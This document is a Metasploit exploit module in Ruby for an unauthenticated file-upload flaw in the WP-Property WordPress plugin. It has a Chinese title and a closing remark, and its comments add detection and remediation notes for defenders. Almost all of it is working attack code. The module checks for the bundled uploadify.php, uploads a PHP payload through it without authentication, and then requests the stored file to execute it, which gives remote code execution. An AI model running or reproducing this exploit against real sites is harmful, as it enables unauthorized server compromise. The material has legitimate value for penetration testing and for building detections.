WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

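# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the description below).
#
# Root cause as exercised by this module: the bundled
# third-party/uploadify/uploadify.php accepts a multipart upload without
# authentication and stores it under a caller-supplied "folder"; the stored
# file is then requested over HTTP.
#
# Defender notes, derived from the requests this module sends:
# - Log signature: a POST to .../wp-property/third-party/uploadify/uploadify.php
#   carrying a "Filedata" part whose filename ends in ".php", followed by a
#   GET for the path echoed back in the upload response.
# - The uploaded file name is five random letters plus ".php", so match on
#   location and extension rather than on name. The payload is requested with
#   :unlink_self, so presumably the file is gone from disk once it has run;
#   rely on web-server logs rather than a later file listing.
# - NOTE(review): remediation is not stated on this page. Confirm the fixed
#   plugin version against the references; removing or blocking uploadify.php
#   and denying PHP execution in writable plugin directories are the usual
#   compensating controls.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Directory of the bundled uploadify script, relative to the WordPress root.
  UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'.freeze

  # Registers module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the uploadify script with a single GET.
  #
  # An HTTP 200 only shows that uploadify.php is present and reachable; the
  # plugin version is never inspected, which is why the strongest result is
  # Appears rather than Vulnerable. A patched or hardened install that still
  # serves the file will also report Appears.
  #
  # @return [Exploit::CheckCode] Unknown on no response or a non-200 status,
  #   Appears otherwise
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uploadify_dir_uri}uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads the generated PHP payload through uploadify.php, then requests the
  # path the server echoes back.
  #
  # Fails with UnexpectedReply when the upload response is missing, is not a
  # 200, or does not mention the uploaded file name.
  def exploit
    upload_dir = uploadify_dir_uri
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    # Two form fields: the file itself ("Filedata") and the destination
    # directory ("folder"), which the server takes from the request.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part(upload_dir, nil, nil, "form-data; name=\"folder\"")
    # Presumably trims the CRLF Rex emits ahead of a boundary line so the
    # body starts directly with the boundary -- TODO confirm against Rex::MIME.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{upload_dir}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # Literal substring match: the original interpolated the name into a
    # regex, where the "." of ".php" matched any character.
    unless res && res.code == 200 && res.body.to_s.include?(@payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the path of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # Builds the URI of the uploadify directory under TARGETURI, adding the
  # trailing slash when it is missing. Works on a new string so the value
  # returned by target_uri.path is never modified in place.
  #
  # @return [String] URI path ending in "/"
  def uploadify_dir_uri
    base = target_uri.path
    base = "#{base}/" unless base.end_with?('/')
    "#{base}#{UPLOADIFY_DIR}"
  end
end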
不要问我这写的是什么 怎么利用 我是说msf.